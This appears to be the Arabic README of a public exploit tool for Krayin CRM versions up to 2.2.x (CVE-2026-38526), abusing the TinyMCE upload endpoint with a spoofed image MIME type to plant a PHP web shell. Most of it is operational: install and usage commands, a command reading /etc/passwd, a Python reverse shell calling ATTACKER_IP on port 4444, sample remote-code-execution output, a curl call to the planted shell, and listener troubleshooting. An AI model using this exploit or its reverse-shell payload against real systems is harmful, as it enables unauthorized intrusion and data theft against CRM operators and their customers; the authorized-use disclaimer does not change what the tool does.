
استغلال آلي لـ Krayin CRM الإصدارات ≤ 2.2.x.
أداة استغلال آلية لـ Krayin CRM ≤ 2.2.x. يستغل هذا السكربت ثغرة رفع ملفات غير مقيدة في نقطة نهاية TinyMCE (/admin/tinymce/upload)، ويتجاوز التحقق من نوع MIME عبر انتحال image/jpeg، ويرفع ويب شيل PHP، وينفّذ أوامر عشوائية بصلاحيات خادم الويب.
| الخاصية | القيمة |
|---|---|
| CVE ID | CVE-2026-38526 |
| البرنامج المتأثر | Krayin CRM ≤ 2.2.x |
| نوع الثغرة | رفع ملفات غير مقيّد → تنفيذ كود عن بُعد |
| المصادقة | مطلوبة (أي حساب مسؤول صالح) |
| نقطة النهاية | POST /admin/tinymce/upload |
requestsgit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload مع انتحال نوع MIME[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
فشل المصادقة: تحقق من صحة بيانات الاعتماد ومن أن الحساب موجود على النظام المستهدف.
فشل استخراج رمز CSRF: تأكد من أن الهدف يشغّل إصدار Krayin CRM القابل للاستغلال وأن نقطة نهاية تسجيل الدخول يمكن الوصول إليها.
قشرة عكسية لا تتصل: تأكد من أن المستمع (listener) يعمل (nc -lvnp <PORT>)، وأن قواعد جدار الحماية تسمح بالاتصالات الصادرة، وأن عنوان IP والمنفذ في الحمولة صحيحان.
هذه الأداة مقدمة حصريًا لأغراض الاختبارات الأمنية المصرّح بها والتعليم فقط. الوصول غير المصرّح به إلى الأنظمة الحاسوبية غير قانوني. يتحمل المستخدمون وحدهم مسؤولية ضمان حصولهم على التفويض المناسب قبل اختبار أي نظام مستهدف. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة.
b0nyo - تنفيذ الإثبات العملي (PoC)
TREXNEGRO - اكتشاف الثغرة
| العلامة | الوصف | مثال |
|---|
-i | عنوان URL المستهدف (مع أو بدون http://) | http://target.com أو target.com |
-u | البريد الإلكتروني/اسم المستخدم للمسؤول | [email protected] |
-p | كلمة مرور المسؤول | AdminPassword123! |
-c | الأمر المراد تنفيذه (الافتراضي: id) | whoami |